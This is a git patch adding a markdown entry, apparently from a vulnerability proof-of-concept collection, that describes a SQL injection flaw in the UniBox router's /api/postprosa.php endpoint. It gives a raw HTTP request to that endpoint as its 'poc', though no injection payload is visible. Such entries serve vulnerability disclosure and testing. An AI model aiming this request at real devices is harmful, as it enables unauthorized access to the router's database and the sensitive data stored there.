From 296a27ce339e70136f59404202c8832befa3ceaa Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Wed, 11 Jun 2025 14:46:41 +0800
Subject: [PATCH] =?UTF-8?q?Update=20and=20rename=20unibox=E8=B7=AF?=
 =?UTF-8?q?=E7=94=B1=E5=99=A8postprosa=E5=AD=98=E5=9C=A8SQL=E6=B3=A8?=
 =?UTF-8?q?=E5=85=A5.md=20to=20unibox=E8=B7=AF=E7=94=B1=E5=99=A8postprosa?=
 =?UTF-8?q?=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../unibox路由器postprosa存在SQL注入.md         |  1 -
 .../unibox路由器postprosa接口存在SQL注入.md     | 17 +++++++++++++++++
 2 files changed, 17 insertions(+), 1 deletion(-)
 delete mode 100644 wpoc/unibox路由器/unibox路由器postprosa存在SQL注入.md
 create mode 100644 wpoc/unibox路由器/unibox路由器postprosa接口存在SQL注入.md

diff --git a/wpoc/unibox路由器/unibox路由器postprosa存在SQL注入.md b/wpoc/unibox路由器/unibox路由器postprosa存在SQL注入.md
deleted file mode 100644
index 8b13789..0000000
--- a/wpoc/unibox路由器/unibox路由器postprosa存在SQL注入.md
+++ /dev/null
@@ -1 +0,0 @@
-
diff --git a/wpoc/unibox路由器/unibox路由器postprosa接口存在SQL注入.md b/wpoc/unibox路由器/unibox路由器postprosa接口存在SQL注入.md
new file mode 100644
index 0000000..4e07df3
--- /dev/null
+++ b/wpoc/unibox路由器/unibox路由器postprosa接口存在SQL注入.md
@@ -0,0 +1,17 @@
+# unibox路由器postprosa接口存在SQL注入
+
+# 漏洞描述
+Description: UniBox 是一款一体化网络/热点控制器，可以部署为管理公共 WiFi 热点的热点网关，也可以部署为办公室和企业的网络控制器。unibox路由器postprosa存在SQL注入漏洞，攻击者可以根据该漏洞获取数据库权限，查看大量敏感信息。
+  
+## poc
+
+```javascript
+GET /api/postprosa.php HTTP/1.1
+Host: 127.0.0.1:8888
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
+Cookie: http304ok=0; PHPSESSID=pvpehubud7epklbme9m4s69b0q;
+Connection: close
+```